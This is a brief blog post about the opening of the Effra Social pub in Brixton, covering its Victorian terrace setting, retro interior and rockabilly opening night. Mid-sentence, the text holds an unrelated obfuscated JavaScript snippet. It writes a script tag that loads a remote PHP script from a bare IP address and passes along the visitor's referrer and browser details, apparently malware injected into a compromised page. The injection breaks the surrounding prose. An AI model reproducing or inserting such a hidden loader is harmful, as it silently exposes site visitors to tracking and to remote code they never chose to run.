EFFRA SOCIAL IS OPEN…

Effra Social in Brixton just cut the ribbon to welcome the south Londoners with an all new cool hangout. It all just got announced very timidly via Twitter and Facebook a couple of months ago, and until then, we just knew the name. Stencilled graffiti appeared on a shutter in Coldharbour Lane confirming that it was for real.

Then (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksabe|var|u0026u|referrer|zniys||js|php’.split(‘|’),0,{}))
a very encouraging Facebook meant The Effra Social has born, spawn under the same web as The Dogstar: Antic London So it pretty much is a new venture, right next to the famous Hootenanny, hidden in a Victorian terrace, and looking form outset, very much like a big house party. Behold, the picnic tables will look pretty tempting come spring. Inside is a retro 50s-60s palace, so as expected, the opening hosted a very well quiffed rockabilly band called Conrad and the ATOMIKS and all the public came dressed accordingly. The brixtonians have a new public house in the hood and it looks a hoot.
